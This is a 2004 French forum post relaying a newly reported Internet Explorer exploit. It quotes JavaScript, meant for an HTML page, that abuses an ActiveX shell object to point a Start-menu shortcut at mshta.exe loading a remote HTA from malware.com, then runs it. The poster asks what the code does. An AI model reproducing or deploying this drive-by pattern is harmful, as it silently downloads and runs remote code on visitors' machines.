URL: https://linuxfr.org/users/ploum/journaux/nouvel-exploit-pour-ie Title: Nouvel exploit pour IE : Authors: ploum Date: 2004年01月07日T13:34:02+01:00 Tags: Score: 0 [http://www.internetaddict.be/index.cfm?PageID=11&nID=9601&a(...)](http://www.internetaddict.be/index.cfm?PageID=11&nID=9601&act=I&language_code=FRA) Le code est celui-ci : Code: <script> // jelmer is in the zone // 01.01.04 [http://www.malware.com(...)](http://www.malware.com) // adjust as required - many more setups var objShell = new ActiveXObject("Shell.Application"); objFolder = objShell.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories"); objFolderItem = objFolder.ParseName("Paint.lnk"); objShellLink = objFolderItem.GetLink; objShellLink.Path = "mshta.exe" objShellLink.Arguments ="[http://www.malware.com/poopware.hta(...)](http://www.malware.com/poopware.hta)" objShellLink.Save("C:\\jelmer.lnk"); objShell.Open("C:\\jelmer.lnk"); </script> (le tout dans une page html) JE comprend pas trop c'est quoi mshta.exe ni à ce qu'est censé faire poopware.hta (c'est un code bizarre) PS : j'ai vu cette info sur : [http://www.unixtech.be(...)](http://www.unixtech.be)

AltStyle によって変換されたページ (->オリジナル) /